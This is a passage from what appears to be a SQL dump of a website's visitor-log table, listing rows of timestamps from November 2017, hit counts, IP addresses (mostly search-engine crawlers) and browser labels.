0,'51.255.65.41','other'),(180378,1511372334,1,1,0,0,'51.255.65.58','other'),(180379,1511373055,1,1,0,0,'66.249.64.30','chrome'),(180380,1511373062,1,1,0,0,'66.249.70.27','chrome'),(180381,1511373273,1,1,0,0,'217.182.132.21','other'),(180382,1511373347,1,1,0,0,'8.29.198.26','other'),(180383,1511373968,1,1,0,0,'217.182.132.65','other'),(180384,1511375695,1,1,0,0,'217.182.132.240','other'),(180385,1511376284,1,1,0,0,'217.182.132.86','other'),(180386,1511376612,1,1,0,0,'40.77.167.102','other'),(180387,1511376671,1,0,1,0,'66.249.64.29',''),(180388,1511377335,1,1,0,0,'130.180.211.161','chrome'),(180389,1511377400,1,1,0,0,'46.161.9.39','firefox'),(180390,1511377419,1,1,0,0,'217.182.132.192','other'),(180391,1511378098,1,1,0,0,'51.255.65.66','other'),(180392,1511378685,1,1,0,0,'51.255.71.129','other'),(180393,1511379044,1,1,0,0,'40.77.167.102','other'),(180394,1511380103,1,0,1,0,'66.249.70.25',''),(180395,1511380108,1,1,0,0,'51.255.65.54','other'),(180396,1511380911,1,1,0,0,'46.150.97.71','firefox'),(180397,1511381073,1,1,0,0,'66.249.64.30','chrome'),(180398,1511381080,2,1,1,0,'66.249.70.25',''),(180399,1511381189,1,1,0,0,'5.58.39.107','msie'),(180400,1511381619,1,1,0,0,'91.209.11.236','other'),(180401,1511381903,1,1,0,0,'66.249.64.29','chrome'),(180402,1511381930,1,1,0,0,'217.182.132.96','other'),(180403,1511382258,1,1,0,0,'217.182.132.76','other'),(180404,1511382281,1,1,0,0,'162.210.196.98','other'),(180405,1511382875,1,1,0,0,'51.255.65.95','other'),(180406,1511383054,2,2,0,0,'216.244.66.237','other'),(180407,1511383081,1,1,0,0,'62.210.101.96','other'),(180408,1511383306,1,1,0,0,'87.250.224.46','other'),(180409,1511383457,1,1,0,0,'151.80.27.116','other'),(180410,1511383476,1,1,0,0,'217.182.132.55','other'),(180411,1511383795,1,1,0,0,'95.108.213.24','other'),(180412,1511383869,1,1,0,0,'217.182.132.64','other'),(180413,1511383964,1,1,0,0,'51.255.65.2','other'),(180414,1511384016,1,1,0,0,'51.255.65.27','other'),(180415,1511384123,1,1,0,0,'51.255.65.93','other'),(180416,1511384182,1,1,0,0,'8.29.198.26','other'),(180417,1511384207,1,1,0,0,'178.154.171.88','other'),(180418,1511384253,1,1,0,0,'157.55.39.243','other'),(180419,1511384508,2,2,0,0,'216.244.66.237','other'),(180420,1511385063,1,1,0,0,'217.182.132.81','other'),(180421,1511385174,1,0,1,0,'66.249.70.27',''),(180422,1511385823,1,1,0,0,'216.244.66.237','other'),(180423,1511386124,1,1,0,0,'51.255.65.8','other'),(180424,1511386140,1,1,0,0,'51.255.65.68','other'),(180425,1511386160,1,1,0,0,'217.182.132.172','other'),(180426,1511386219,1,1,0,0,'217.182.132.87','other'),(180427,1511386552,1,1,0,0,'66.249.64.29','chrome'),(180428,1511386559,1,1,0,0,'66.249.70.29','chrome'),(180429,1511386854,1,1,0,0,'40.77.167.102','other'),(180430,1511386936,1,0,1,0,'66.249.64.28',''),(180431,1511387135,1,1,0,0,'216.244.66.237','other'),(180432,1511387239,1,1,0,0,'51.255.65.6','other'),(180433,1511387419,1,1,0,0,'157.55.39.243','other'),(180434,1511387873,1,1,0,0,'217.182.132.87','other'),(180435,1511388000,10,10,0,0,'173.208.188.202','msie'),(180436,1511388848,1,1,0,0,'51.255.65.60','other'),(180437,1511389385,1,1,0,0,'91.196.178.164','chrome'),(180438,1511389611,1,1,0,0,'199.30.25.93','other'),(180439,1511389622,1,1,0,0,'51.255.65.66','other'),(180440,1511389839,1,1,0,0,'217.182.132.77','other'),(180441,1511389874,1,1,0,0,'217.182.132.176','other'),(180442,1511390134,1,1,0,0,'51.255.65.60','other'),(180443,1511390221,1,1,0,0,'51.255.65.47','other'),(180444,1511390319,1,1,0,0,'217.182.132.50','other'),(180445,1511390543,1,1,0,0,'141.8.142.74','other'),(180446,1511390976,1,1,0,0,'51.255.65.65','other'),(180447,1511391478,1,1,0,0,'216.244.66.237','other'),(180448,1511391652,1,1,0,0,'217.182.132.157','other'),(180449,1511392157,1,1,0,0,'137.74.207.102','other'),(180450,1511392175,1,1,0,0,'66.249.64.30','chrome'),(180451,1511392184,1,1,0,0,'66.249.70.25','chrome'),(180452,1511393022,1,1,0,0,'51.255.71.115','other'),(180453,1511393066,1,1,0,0,'178.154.171.10','other'),(180454,1511393307,1,1,0,0,'51.255.65.56','other'),(180455,1511393789,1,1,0,0,'51.255.65.88','other'),(180456,1511393818,1,1,0,0,'217.182.132.56','other'),(180457,1511394181,1,1,0,0,'217.182.132.33','other'),(180458,1511394287,1,0,1,0,'66.249.64.30',''),(180459,1511394428,1,1,0,0,'217.182.132.68','other'),(180460,1511394604,1,1,0,0,'217.182.132.179','other'),(180461,1511394614,1,1,0,0,'46.188.88.244','chrome'),(180462,1511394629,1,1,0,0,'217.182.132.23','other'),(180463,1511394844,1,0,1,0,'66.249.64.29',''),(180464,1511395012,1,1,0,0,'8.29.198.25','other'),(180465,1511395546,1,1,0,0,'180.76.15.137','other'),(180466,1511395921,1,1,0,0,'66.249.64.28','chrome'),(180467,1511395962,1,1,0,0,'217.182.132.16','other'),(180468,1511395992,2,2,0,0,'141.8.142.74','other'),(180469,1511396442,1,1,0,0,'51.255.65.84','other'),(180470,1511396879,1,0,1,0,'66.249.64.28',''),(180471,1511397041,1,1,0,0,'217.182.132.94','other'),(180472,1511397101,2,2,0,0,'216.244.66.237','other'),(180473,1511397219,1,1,0,0,'66.249.64.28','chrome'),(180474,1511397234,1,1,0,0,'66.249.70.25','chrome'),(180475,1511397309,1,1,0,0,'51.255.71.127','other'),(180476,1511397464,1,1,0,0,'217.182.132.27','other'),(180477,1511397880,1,1,0,0,'92.113.85.61','chrome'),(180478,1511399327,1,1,0,0,'51.255.65.59','other'),(180479,1511399466,1,1,0,0,'51.255.65.75','other'),(180480,1511399637,1,0,1,0,'66.249.69.158',''),(180481,1511400751,1,1,0,0,'217.182.132.151','other'),(180482,1511401137,1,1,0,0,'141.8.132.19','other'),(180483,1511401152,1,1,0,0,'216.244.66.237','other'),(180484,1511401228,1,1,0,0,'91.209.11.236','other'),(180485,1511401258,1,1,0,0,'207.46.13.178','other'),(180486,1511401324,2,2,0,0,'141.8.142.74','other'),(180487,1511401370,1,1,0,0,'66.249.75.201','chrome'),(180488,1511401384,1,1,0,0,'66.249.69.157','chrome'),(180489,1511401444,1,1,0,0,'66.249.75.199','chrome'),(180490,1511402299,1,1,0,0,'51.255.65.79','other'),(180491,1511402415,1,1,0,0,'216.244.66.237','other'),(180492,1511402635,1,1,0,0,'207.46.13.178','other'),(180493,1511402649,1,1,0,0,'5.45.207.82','other'),(180494,1511402724,1,1,0,0,'217.182.132.33','other'),(180495,1511402832,1,1,0,0,'141.8.142.74','other'),(180496,1511403030,1,1,0,0,'164.132.162.188','other'),(180497,1511403063,1,1,0,0,'91.209.11.236','other'),(180498,1511403312,1,1,0,0,'178.154.171.60','other'),(180499,1511403767,1,0,1,0,'66.249.75.199',''),(180500,1511403916,1,1,0,0,'216.244.66.237','other'),(180501,1511404359,1,1,0,0,'87.250.224.46','other'),(180502,1511404825,1,1,0,0,'51.255.71.121','other'),(180503,1511404996,1,1,0,0,'51.255.71.128','other'),(180504,1511405174,1,1,0,0,'216.244.66.237','other'),(180505,1511405366,1,1,0,0,'66.249.75.199','chrome'),(180506,1511405385,1,1,0,0,'66.249.69.157','chrome'),(180507,1511405663,1,1,0,0,'51.255.65.97','other'),(180508,1511405785,1,1,0,0,'51.255.65.40','other'),(180509,1511405841,1,1,0,0,'8.29.198.27','other'),(180510,1511405957,1,1,0,0,'51.255.65.77','other'),(180511,1511406265,1,1,0,0,'217.182.132.181','other'),(180512,1511406574,1,1,0,0,'216.244.66.237','other'),(180513,1511406667,1,1,0,0,'91.209.11.236','other'),(180514,1511406785,1,1,0,0,'51.255.65.48','other'),(180515,1511407000,1,1,0,0,'66.249.75.195','chrome'),(180516,1511407366,1,1,0,0,'217.182.132.193','other'),(180517,1511407580,1,1,0,0,'217.182.132.155','other'),(180518,1511407595,1,1,0,0,'141.8.142.74','other'),(180519,1511407807,1,1,0,0,'137.74.207.120','other'),(180520,1511407921,1,1,0,0,'216.244.66.237','other'),(180521,1511408354,1,1,0,0,'37.9.113.114','other'),(180522,1511408527,1,0,1,0,'68.180.229.52',''),(180523,1511408920,1,1,0,0,'37.9.113.182','other'),(180524,1511409270,1,1,0,0,'51.255.65.86','other'),(180525,1511409295,1,1,0,0,'51.255.65.87','other'),(180526,1511409956,1,1,0,0,'137.74.207.161','other'),(180527,1511410079,1,1,0,0,'151.80.27.116','other'),(180528,1511410467,1,1,0,0,'178.154.171.88','other'),(180529,1511410715,1,1,0,0,'54.165.59.7','other'),(180530,1511411064,1,1,0,0,'91.209.11.236','other'),(180531,1511411116,1,1,0,0,'66.249.75.201','chrome'),(180532,1511411197,1,1,0,0,'180.76.15.147','other'),(180533,1511411562,1,1,0,0,'51.255.65.19','other'),(180534,1511411570,1,1,0,0,'141.8.142.74','other'),(180535,1511411955,2,2,0,0,'54.165.59.7','other'),(180536,1511412048,1,1,0,0,'66.249.75.201','chrome'),(180537,1511412622,1,0,1,0,'66.249.75.195',''),(180538,1511412743,1,1,0,0,'51.255.65.48','other'),(180539,1511412954,2,2,0,0,'54.165.59.7','other'),(180540,1511412988,1,1,0,0,'51.255.71.118','other'),(180541,1511413109,1,1,0,0,'51.255.65.64','other'),(180542,1511413134,1,1,0,0,'51.255.71.98','other'),(180543,1511413140,1,1,0,0,'217.182.132.76','other'),(180545,1511413238,1,1,0,0,'151.80.27.116','other'),(180546,1511413247,1,1,0,0,'66.249.75.201','chrome'),(180547,1511413330,1,1,0,0,'66.249.75.195','chrome'),(180548,1511413600,1,1,0,0,'51.255.65.96','other'),(180549,1511413606,1,1,0,0,'217.182.132.86','other'),(180550,1511413827,2,2,0,0,'141.8.142.74','other'),(180551,1511414294,1,1,0,0,'217.182.132.188','other'),(180552,1511414560,1,1,0,0,'51.255.65.42','other'),(180553,1511414600,1,1,0,0,'137.74.207.108','other'),(180554,1511414714,1,1,0,0,'91.209.11.236','other'),(180555,1511414806,1,1,0,0,'137.74.207.120','other'),(180556,1511414849,1,1,0,0,'207.46.13.178','other'),(180557,1511414976,1,1,0,0,'87.250.224.46','other'),(180558,1511415029,1,1,0,0,'51.255.65.15','other'),(180559,1511415505,1,1,0,0,'217.182.132.73','other'),(180560,1511415573,1,0,1,0,'66.249.75.201',''),(180561,1511415762,1,1,0,0,'51.255.65.94','other'),(180562,1511415887,1,0,1,0,'66.249.69.156',''),(180563,1511416658,1,1,0,0,'216.244.66.237','other'),(180564,1511416672,1,1,0,0,'8.29.198.26','other'),(180565,1511416691,1,1,0,0,'91.209.11.236','other'),(180566,1511416774,1,1,0,0,'40.77.167.44','other'),(180567,1511417238,1,0,1,0,'68.180.229.52',''),(180568,1511417558,1,1,0,0,'217.182.132.51','other'),(180569,1511417741,1,0,1,0,'66.249.75.199',''),(180570,1511417776,1,1,0,0,'51.255.65.72','other'),(180571,1511418072,1,1,0,0,'51.255.65.43','other'),(180572,1511418443,2,2,0,0,'178.154.171.88','other'),(180573,1511418628,69,69,0,0,'94.199.151.22','other'),(180574,1511419085,1,1,0,0,'51.255.71.110','other'),(180575,1511419242,1,1,0,0,'91.209.11.236','other'),(180576,1511419332,1,1,0,0,'5.45.207.49','other'),(180577,1511419340,1,1,0,0,'217.182.132.182','other'),(180578,1511419415,1,1,0,0,'178.154.171.55','other'),(180579,1511419419,1,1,0,0,'37.9.113.134','other'),(180580,1511419510,1,1,0,0,'51.255.65.28','other'),(180581,1511419529,1,1,0,0,'217.182.132.4','other'),(180582,1511419769,1,1,0,0,'216.244.66.237','other'),(180583,1511420074,1,1,0,0,'217.182.132.151','other'),(180584,1511420137,1,1,0,0,'87.250.224.46','other'),(180585,1511420402,1,1,0,0,'78.111.185.3','chrome'),(180586,1511420492,1,1,0,0,'66.249.75.195','chrome'),(180587,1511420809,1,1,0,0,'66.249.75.199','chrome'),(180588,1511420947,1,1,0,0,'217.182.132.18','other'),(180589,1511420969,1,1,0,0,'213.180.203.8','other'),(180590,1511421047,1,1,0,0,'82.144.213.78','chrome'),(180591,1511421102,1,1,0,0,'91.196.178.71','chrome'),(180592,1511421172,1,1,0,0,'216.244.66.237','other'),(180593,1511421499,1,1,0,0,'178.92.157.190','chrome'),(180594,1511421627,1,1,0,0,'66.249.75.201','chrome'),(180595,1511421663,1,1,0,0,'51.255.65.37','other'),(180596,1511421712,1,1,0,0,'91.196.178.66','chrome'),(180597,1511422531,2,2,0,0,'216.244.66.237','other'),(180598,1511422943,1,1,0,0,'91.209.11.236','other'),(180599,1511422985,1,1,0,0,'141.8.142.74','other'),(180600,1511423014,1,1,0,0,'51.255.65.37','other'),(180601,1511423140,1,1,0,0,'66.249.75.201','chrome'),(180602,1511423154,3,3,0,0,'66.249.75.195','chrome'),(180603,1511423654,1,1,0,0,'173.212.236.6','other'),(180604,1511423712,1,1,0,0,'164.132.162.154','other'),(180605,1511423743,1,1,0,0,'51.255.65.84','other'),(180606,1511423857,1,1,0,0,'77.109.20.124','chrome'),(180607,1511423945,1,1,0,0,'51.255.65.66','other'),(180608,1511424261,1,1,0,0,'51.255.65.29','other'),(180609,1511424359,1,1,0,0,'66.249.75.195','chrome'),(180610,1511424764,1,0,1,0,'66.249.69.158',''),(180611,1511424827,1,1,0,0,'217.182.132.154','other'),(180612,1511425263,2,2,0,0,'66.249.75.195','chrome'),(180613,1511425771,1,1,0,0,'137.74.207.109','other'),(180614,1511426413,1,1,0,0,'91.209.11.236','other'),(180615,1511426734,1,1,0,0,'193.201.224.32','chrome'),(180616,1511426837,1,1,0,0,'91.196.177.15','chrome'),(180617,1511427497,1,1,0,0,'91.196.178.167','chrome'),(180618,1511427505,1,1,0,0,'8.29.198.26','other'),(180619,1511427650,1,1,0,0,'178.92.170.95','chrome'),(180620,1511427699,1,1,0,0,'157.55.39.243','other'),(180621,1511427848,1,1,0,0,'217.182.132.176','other'),(180622,1511428205,1,1,0,0,'93.183.226.149','chrome'),(180623,1511428326,1,1,0,0,'66.249.75.199','chrome'),(180624,1511428364,3,3,0,0,'216.244.66.237','other'),(180625,1511428456,1,1,0,0,'91.196.178.70','firefox'),(180626,1511428607,1,1,0,0,'178.92.170.95','chrome'),(180627,1511428958,2,2,0,0,'141.8.142.74','other'),(180628,1511429222,1,1,0,0,'178.154.171.88','other'),(180629,1511429325,1,1,0,0,'66.249.69.157','chrome'),(180630,1511429822,1,1,0,0,'66.249.75.201','chrome'),(180631,1511430096,1,1,0,0,'178.92.170.95','chrome'),(180632,1511430300,1,1,0,0,'141.8.142.74','other'),(180633,1511430365,1,1,0,0,'91.209.11.236','other'),(180634,1511430418,1,1,0,0,'217.182.132.27','other'),(180635,1511430458,1,0,1,0,'66.249.69.157',''),(180636,1511430845,1,1,0,0,'51.255.65.22','other'),(180637,1511431356,2,2,0,0,'216.244.66.237','other'),(180638,1511431617,1,1,0,0,'51.255.65.46','other'),(180639,1511431685,1,1,0,0,'141.8.142.74','other'),(180640,1511431879,1,1,0,0,'217.182.132.83','other'),(180641,1511432175,1,1,0,0,'87.250.224.85','other'),(180642,1511432797,1,1,0,0,'216.244.66.237','other'),(180643,1511432810,1,1,0,0,'51.255.65.65','other'),(180644,1511433005,1,1,0,0,'66.249.75.199','chrome'),(180645,1511433219,2,2,0,0,'141.8.142.74','other'),(180646,1511433405,1,1,0,0,'217.182.132.18','other'),(180647,1511433511,1,1,0,0,'51.255.65.72','other'),(180648,1511433939,1,1,0,0,'217.182.132.68','other'),(180649,1511433963,1,1,0,0,'91.196.178.69','chrome'),(180650,1511434153,1,1,0,0,'217.182.132.37','other'),(180651,1511434355,1,1,0,0,'40.77.167.44','other'),(180652,1511434677,1,1,0,0,'217.182.132.14','other'),(180653,1511434743,1,1,0,0,'95.135.89.198','chrome'),(180654,1511435056,1,1,0,0,'141.8.142.74','other'),(180655,1511435541,1,1,0,0,'51.255.65.28','other'),(180656,1511435647,1,1,0,0,'216.244.66.237','other'),(180657,1511435816,1,1,0,0,'95.135.89.198','chrome'),(180658,1511435928,1,1,0,0,'54.208.102.37','other'),(180659,1511435943,1,1,0,0,'217.182.132.86','other'),(180660,1511436057,1,1,0,0,'217.182.132.50','other'),(180661,1511436086,1,1,0,0,'54.165.59.7','other'),(180662,1511436161,1,0,1,0,'68.180.229.52',''),(180663,1511436189,1,0,1,0,'66.249.75.195',''),(180664,1511436276,1,1,0,0,'51.255.65.13','other'),(180665,1511436916,1,1,0,0,'216.244.66.237','other'),(180666,1511437346,1,1,0,0,'141.8.142.74','other'),(180667,1511437536,1,0,1,0,'66.249.69.157',''),(180668,1511437656,2,2,0,0,'178.154.171.88','other'),(180669,1511438208,1,1,0,0,'91.196.178.33','chrome'),(180670,1511438342,1,1,0,0,'8.29.198.26','other'),(180671,1511438403,1,1,0,0,'46.175.142.172','firefox'),(180672,1511438599,1,1,0,0,'217.182.132.54','other'),(180673,1511438633,1,1,0,0,'217.182.132.68','other'),(180674,1511438657,1,1,0,0,'217.182.132.156','other'),(180675,1511438775,1,1,0,0,'66.249.69.158','chrome'),(180676,1511439096,1,1,0,0,'51.255.65.2','other'),(180677,1511439518,1,1,0,0,'216.244.66.237','other'),(180678,1511440012,1,1,0,0,'51.255.71.116','other'),(180679,1511440120,1,1,0,0,'176.108.15.203','chrome'),(180680,1511440201,1,1,0,0,'51.255.65.83','other'),(180681,1511440736,1,1,0,0,'217.182.132.174','other'),(180682,1511440917,1,1,0,0,'216.244.66.237','other'),(180683,1511441836,1,1,0,0,'217.69.134.161','other'),(180684,1511442136,1,1,0,0,'51.255.65.22','other'),(180685,1511442244,1,1,0,0,'217.69.133.194','other'),(180686,1511442429,2,2,0,0,'141.8.142.74','other'),(180687,1511442791,1,0,1,0,'66.249.69.156',''),(180688,1511443679,2,2,0,0,'216.244.66.237','other'),(180689,1511444019,1,1,0,0,'180.76.15.25','other'),(180690,1511444213,1,1,0,0,'141.8.142.74','other'),(180691,1511444352,1,1,0,0,'51.255.65.40','other'),(180692,1511444454,1,1,0,0,'37.52.120.220','chrome'),(180693,1511444636,2,2,0,0,'91.196.178.70','chrome'),(180694,1511444750,1,1,0,0,'37.9.113.115','other'),(180695,1511444845,1,1,0,0,'87.250.224.46','other'),(180696,1511444969,1,1,0,0,'95.132.37.70','firefox'),(180697,1511445069,1,1,0,0,'82.207.122.32','chrome'),(180698,1511445523,2,2,0,0,'141.8.142.74','other'),(180699,1511445668,1,1,0,0,'217.182.132.184','other'),(180700,1511445707,1,1,0,0,'217.182.132.172','other'),(180701,1511445895,1,1,0,0,'51.255.65.29','other'),(180702,1511445965,1,1,0,0,'95.24.16.51','msie'),(180703,1511446088,1,1,0,0,'217.182.132.176','other'),(180704,1511446212,1,1,0,0,'91.196.178.161','chrome'),(180705,1511446751,1,1,0,0,'178.154.171.88','other'),(180706,1511446802,1,1,0,0,'95.24.5.231','msie'),(180707,1511446887,1,1,0,0,'51.255.65.68','other'),(180708,1511447228,1,1,0,0,'217.182.132.97','other'),(180709,1511447699,3,3,0,0,'141.8.142.74','other'),(180710,1511447911,2,2,0,0,'178.154.171.88','other'),(180711,1511447988,2,2,0,0,'216.244.66.237','other'),(180712,1511448019,1,1,0,0,'180.76.15.10','other'),(180713,1511448345,1,1,0,0,'95.132.37.70','firefox'),(180714,1511448398,1,0,1,0,'66.249.69.158',''),(180715,1511448425,7,7,0,0,'178.238.224.129','other'),(180716,1511448445,10,10,0,0,'69.30.205.218','other'),(180717,1511448695,1,1,0,0,'141.8.142.74','other'),(180718,1511449175,1,1,0,0,'8.29.198.27','other'),(180719,1511449181,1,1,0,0,'91.196.178.70','chrome'),(180720,1511449200,1,1,0,0,'217.182.132.16','other'),(180721,1511449341,1,1,0,0,'216.244.66.237','other'),(180722,1511449586,1,1,0,0,'217.182.132.181','other'),(180723,1511450029,1,1,0,0,'51.255.65.61','other'),(180724,1511450091,1,1,0,0,'91.196.178.167','chrome'),(180725,1511450233,1,1,0,0,'51.255.71.131','other'),(180726,1511450364,1,1,0,0,'31.43.3.195','chrome'),(180727,1511450550,1,1,0,0,'40.77.167.81','other'),(180728,1511450579,1,1,0,0,'91.196.178.66','chrome'),(180729,1511450774,1,1,0,0,'217.182.132.35','other'),(180730,1511451201,1,1,0,0,'51.255.65.25','other'),(180731,1511451800,1,1,0,0,'51.255.71.100','other'),(180732,1511452014,1,1,0,0,'216.244.66.237','other'),(180733,1511452198,1,1,0,0,'164.132.162.164','other'),(180734,1511452416,1,1,0,0,'217.182.132.29','other'),(180735,1511452596,1,1,0,0,'164.132.162.160','other'),(180736,1511452953,1,1,0,0,'51.255.65.71','other'),(180737,1511453169,1,1,0,0,'165.227.130.77','chrome'),(180738,1511453293,1,1,0,0,'51.255.65.31','other'),(180739,1511453361,1,1,0,0,'91.196.178.37','chrome'),(180740,1511453465,1,1,0,0,'51.255.65.60','other'),(180741,1511453968,1,1,0,0,'217.182.132.78','other'),(180742,1511454445,1,1,0,0,'51.255.65.67','other'),(180743,1511454643,1,1,0,0,'188.163.71.221','chrome'),(180744,1511455014,1,0,1,0,'66.249.69.158',''),(180745,1511455241,1,1,0,0,'137.74.207.170','other'),(180746,1511455285,2,2,0,0,'216.244.66.237','other'),(180747,1511455347,1,1,0,0,'51.255.65.37','other'),(180748,1511455513,1,1,0,0,'178.154.171.88','other'),(180749,1511455656,1,1,0,0,'51.255.71.122','other'),(180750,1511455824,1,1,0,0,'51.255.71.123','other'),(180751,1511455878,1,1,0,0,'217.182.132.170','other'),(180752,1511455882,1,0,1,0,'66.249.75.195',''),(180753,1511457538,1,1,0,0,'91.196.178.162','chrome'),(180754,1511457839,1,1,0,0,'37.55.57.49','firefox'),(180755,1511457844,1,1,0,0,'91.196.178.66','firefox'),(180756,1511457845,1,1,0,0,'66.249.75.195','chrome'),(180757,1511457982,2,2,0,0,'216.244.66.237','other'),(180758,1511458282,1,1,0,0,'178.154.171.88','other'),(180759,1511458355,1,1,0,0,'51.255.65.63','other'),(180760,1511459246,1,1,0,0,'141.8.142.74','other'),(180761,1511459732,1,1,0,0,'66.249.75.195','chrome'),(180762,1511459914,1,1,0,0,'51.255.65.23','other'),(180763,1511459932,1,1,0,0,'51.255.71.118','other'),(180764,1511460017,1,1,0,0,'8.29.198.27','other'),(180765,1511460327,1,1,0,0,'51.255.65.65','other'),(180766,1511460652,1,1,0,0,'51.255.71.122','other'),(180767,1511460713,1,1,0,0,'217.182.132.84','other'),(180768,1511460750,1,0,1,0,'66.249.69.157',''),(180769,1511461170,1,0,1,0,'66.249.75.201',''),(180770,1511461310,1,1,0,0,'51.255.65.10','other'),(180771,1511461346,1,1,0,0,'91.196.178.69','chrome'),(180772,1511461688,2,2,0,0,'91.196.178.67','firefox'),(180773,1511462166,1,1,0,0,'137.74.207.164','other'),(180774,1511462283,1,1,0,0,'164.132.162.164','other'),(180775,1511462359,1,0,1,0,'66.249.75.199',''),(180776,1511462804,1,1,0,0,'178.95.156.151','chrome'),(180777,1511462933,1,1,0,0,'66.249.75.201','chrome'),(180778,1511463235,1,1,0,0,'217.182.132.64','other'),(180779,1511463379,1,1,0,0,'216.244.66.237','other'),(180780,1511463696,1,1,0,0,'91.196.178.27','chrome'),(180781,1511463711,1,1,0,0,'51.255.65.71','other'),(180782,1511464061,1,1,0,0,'51.255.65.22','other'),(180783,1511464646,1,1,0,0,'217.182.132.178','other'),(180784,1511464689,1,1,0,0,'217.182.132.94','other'),(180785,1511464756,2,2,0,0,'216.244.66.237','other'),(180786,1511464844,1,1,0,0,'207.46.13.178','other'),(180787,1511465426,1,1,0,0,'37.54.19.10','chrome'),(180788,1511466872,1,1,0,0,'51.255.65.91','other'),(180789,1511466947,1,1,0,0,'207.46.13.178','other'),(180790,1511467124,1,1,0,0,'217.182.132.20','other'),(180791,1511467875,1,1,0,0,'217.182.132.179','other'),(180792,1511468746,1,1,0,0,'217.182.132.81','other'),(180793,1511469235,1,1,0,0,'66.249.64.29','chrome'),(180794,1511469712,1,1,0,0,'217.182.132.62','other'),(180795,1511469941,1,1,0,0,'94.231.67.49','chrome'),(180796,1511470103,1,1,0,0,'216.244.66.237','other'),(180797,1511470167,1,0,1,0,'66.249.70.25',''),(180798,1511470423,1,1,0,0,'51.255.65.30','other'),(180799,1511470843,1,1,0,0,'8.29.198.27','other'),(180800,1511471245,1,1,0,0,'207.46.13.178','other'),(180801,1511471326,1,1,0,0,'51.255.65.6','other'),(180802,1511471432,1,1,0,0,'164.132.162.155','other'),(180803,1511471711,1,1,0,0,'40.77.167.81','other'),(180804,1511471746,1,1,0,0,'51.255.65.83','other'),(180805,1511471954,1,1,0,0,'51.255.65.9','other'),(180806,1511472756,1,1,0,0,'51.255.71.129','other'),(180807,1511472866,1,1,0,0,'137.74.207.170','other'),(180808,1511473274,1,1,0,0,'162.210.196.98','other'),(180809,1511473897,1,1,0,0,'51.255.65.83','other'),(180810,1511473997,1,1,0,0,'51.255.65.92','other'),(180811,1511474091,1,1,0,0,'216.244.66.237','other'),(180812,1511474481,1,1,0,0,'164.132.162.188','other'),(180813,1511475358,1,1,0,0,'51.255.65.82','other'),(180814,1511475390,1,0,1,0,'66.249.70.27',''),(180815,1511475780,1,1,0,0,'91.196.178.35','chrome'),(180816,1511476888,1,1,0,0,'216.244.66.237','other'),(180817,1511476967,1,1,0,0,'217.182.132.176','other'),(180818,1511477169,1,1,0,0,'137.74.203.194','other'),(180819,1511477310,1,0,1,0,'66.249.70.29',''),(180820,1511477321,1,1,0,0,'51.255.65.45','other'),(180821,1511477876,1,1,0,0,'217.182.132.82','other'),(180822,1511478031,1,1,0,0,'51.255.65.10','other'),(180823,1511478086,1,0,1,0,'66.249.70.27',''),(180824,1511478283,1,1,0,0,'216.244.66.237','other'),(180825,1511478768,1,1,0,0,'217.182.132.192','other'),(180826,1511478951,1,0,1,0,'66.249.64.29',''),(180827,1511480530,1,1,0,0,'51.255.71.111','other'),(180828,1511481675,1,1,0,0,'8.29.198.25','other'),(180829,1511481775,1,1,0,0,'51.255.65.44','other'),(180830,1511481779,1,1,0,0,'51.255.65.5','other'),(180831,1511481970,1,1,0,0,'217.182.132.14','other'),(180832,1511481978,1,1,0,0,'51.255.65.84','other'),(180833,1511482049,1,1,0,0,'51.255.65.63','other'),(180834,1511482171,1,1,0,0,'180.76.15.9','other'),(180835,1511482424,2,2,0,0,'216.244.66.237','other'),(180836,1511482500,1,1,0,0,'66.249.64.29','chrome'),(180837,1511482647,1,0,1,0,'66.249.64.28',''),(180838,1511482991,1,1,0,0,'51.255.65.83','other'),(180839,1511483682,2,2,0,0,'95.220.81.72','msie'),(180840,1511483802,1,1,0,0,'216.244.66.237','other'),(180841,1511484477,1,0,1,0,'66.249.70.29',''),(180842,1511485008,1,1,0,0,'217.182.132.151','other'),(180843,1511485750,1,1,0,0,'217.182.132.30','other'),(180844,1511486405,1,1,0,0,'217.182.132.91','other'),(180845,1511486688,1,1,0,0,'217.182.132.190','other'),(180846,1511486934,1,1,0,0,'51.255.65.57','other'),(180847,1511486971,1,1,0,0,'217.182.132.22','other'),(180848,1511487103,1,1,0,0,'109.63.171.182','msie'),(180849,1511487474,1,1,0,0,'51.255.65.69','other'),(180850,1511487746,1,1,0,0,'216.244.66.237','other'),(180851,1511487835,1,1,0,0,'51.255.65.61','other'),(180852,1511487950,2,0,2,0,'66.249.64.28',''),(180853,1511488004,1,0,1,0,'66.249.64.30',''),(180854,1511488296,1,1,0,0,'66.249.64.28','chrome'),(180855,1511489778,1,1,0,0,'137.74.207.161','other'),(180856,1511489826,1,1,0,0,'164.132.162.188','other'),(180857,1511489872,1,1,0,0,'217.182.132.156','other'),(180858,1511490456,1,1,0,0,'51.255.71.115','other'),(180859,1511491553,1,1,0,0,'51.255.65.46','other'),(180860,1511492094,1,1,0,0,'51.255.65.9','other'),(180861,1511492502,1,1,0,0,'8.29.198.25','other'),(180862,1511492609,8,8,0,0,'62.210.103.31','other'),(180863,1511492740,1,1,0,0,'51.255.65.10','other'),(180864,1511492777,1,1,0,0,'54.219.178.100','chrome'),(180865,1511492880,1,1,0,0,'217.182.132.146','other'),(180866,1511493007,1,1,0,0,'51.255.71.126','other'),(180867,1511493251,1,1,0,0,'51.255.65.13','other'),(180868,1511493294,1,1,0,0,'137.74.207.164','other'),(180869,1511493300,1,1,0,0,'217.182.132.183','other'),(180870,1511493376,1,1,0,0,'51.255.65.23','other'),(180871,1511493436,2,2,0,0,'216.244.66.237','other'),(180872,1511493511,1,1,0,0,'217.182.132.16','other'),(180873,1511493691,1,1,0,0,'217.182.132.57','other'),(180874,1511493846,1,1,0,0,'51.255.71.112','other'),(180875,1511494271,1,1,0,0,'217.69.133.194','other'),(180876,1511494516,1,1,0,0,'51.255.65.43','other'),(180877,1511494920,1,1,0,0,'51.255.65.15','other'),(180878,1511495127,1,1,0,0,'217.182.132.153','other'),(180879,1511495322,1,1,0,0,'164.132.162.153','other'),(180880,1511495608,1,1,0,0,'51.255.65.44','other'),(180881,1511495882,1,1,0,0,'217.182.132.91','other'),(180882,1511495926,1,1,0,0,'217.182.132.51','other'),(180883,1511496411,1,1,0,0,'217.182.132.37','other'),(180884,1511496971,1,1,0,0,'180.76.15.25','other'),(180885,1511496987,1,1,0,0,'51.255.65.44','other'),(180886,1511497194,1,1,0,0,'217.182.132.179','other'),(180887,1511497960,1,1,0,0,'107.167.116.68','other'),(180888,1511498468,1,1,0,0,'217.182.132.63','other'),(180889,1511498598,1,1,0,0,'109.254.251.9','other'),(180890,1511498892,1,1,0,0,'51.